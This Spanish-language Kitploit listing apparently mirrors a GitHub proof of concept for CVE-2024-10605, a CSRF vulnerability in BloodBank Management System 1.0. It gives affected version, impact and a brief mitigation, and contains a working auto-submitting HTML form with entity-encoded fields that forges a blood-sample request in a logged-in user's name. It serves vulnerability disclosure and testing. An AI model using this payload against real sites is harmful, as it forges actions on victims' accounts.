Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-10605 — Prueba de concepto para CVE-2024-10605, una vulnerabilidad CSRF en BloodBank Management System 1.0 que permite solicitudes no autorizadas de muestras de sangre. | Kitploit
Herramientas/GitHubGitHub/bevennyamande/cve-2024-10605
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubbevennyamande/cve-2024-10605

CVE-2024-10605

Prueba de concepto para CVE-2024-10605, una vulnerabilidad CSRF en BloodBank Management System 1.0 que permite solicitudes no autorizadas de muestras de sangre.

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Versión afectada:

  • BloodBank Management System: 1.0

Información de la vulnerabilidad:

  • Tipo de vulnerabilidad: Cross Site Request Forgery (CSRF)
  • Severidad: ALTA
  • Estado: Sin parche

Endpoint vulnerable:

  • Ruta: file/request.php

Descripción de la vulnerabilidad:

Existe una Cross Site Request Forgery en este endpoint /file/request.php que permite a un usuario remoto iniciar una solicitud de muestra de sangre en la cuenta de un que ha iniciado sesión, desde la muestra de sangre disponible de un hospital seleccionado.

receptor

Una explotación exitosa puede conllevar a acciones no autorizadas en nombre de la víctima. Además, esto podría explotarse visitando sitios web maliciosos con el payload.


Prueba de concepto (PoC):

A continuación se muestra un ejemplo de un Ataque PoC de CSRF que inicia una solicitud de muestra de sangre desde la cuenta de un receptor con sesión iniciada:

root@kitploit:~

<html>
    <head>
        <title>CSRF PoC</title>
    </head>
    <body>
        <form action="http://&#108;&#111;&#99;&#97;&#108;&#104;&#111;&#115;&#116;&#46;&#108;&#111;&#99;&#97;&#108;&#47;&#98;&#108;&#111;&#111;&#100;&#98;&#97;&#110;&#107;&#47;&#102;&#105;&#108;&#101;&#47;&#114;&#101;&#113;&#117;&#101;&#115;&#116;&#46;&#112;&#104;&#112;" method="POST" enctype="application/x-www-form-urlencoded">
            <input name="&#98;&#105;&#100;" value="&#49;&#54;">
            <input name="&#104;&#105;&#100;" value="&#51;">
            <input name="&#98;&#103;" value="&#66;&#45;">
            <input name="&#114;&#101;&#113;&#117;&#101;&#115;&#116;" value="&#82;&#101;&#113;&#117;&#101;&#115;&#116;&#43;&#83;&#97;&#109;&#112;&#108;&#101;">
        </form>
        <script>
            document.querySelector("form").submit();
        </script>
    </body>
</html>






Impacto:

  • Manipulación de datos: Los atacantes podrían modificar el contenido mostrado a los usuarios.
  • Daño reputacional: Los usuarios podrían perder la confianza en el sistema debido a comportamientos maliciosos.

Recomendaciones de mitigación:

  1. Usar token CSRF Implementar un mecanismo para disuadir el acceso entre dominios o incluir tokens csrf en su solicitud.

Descargar herramienta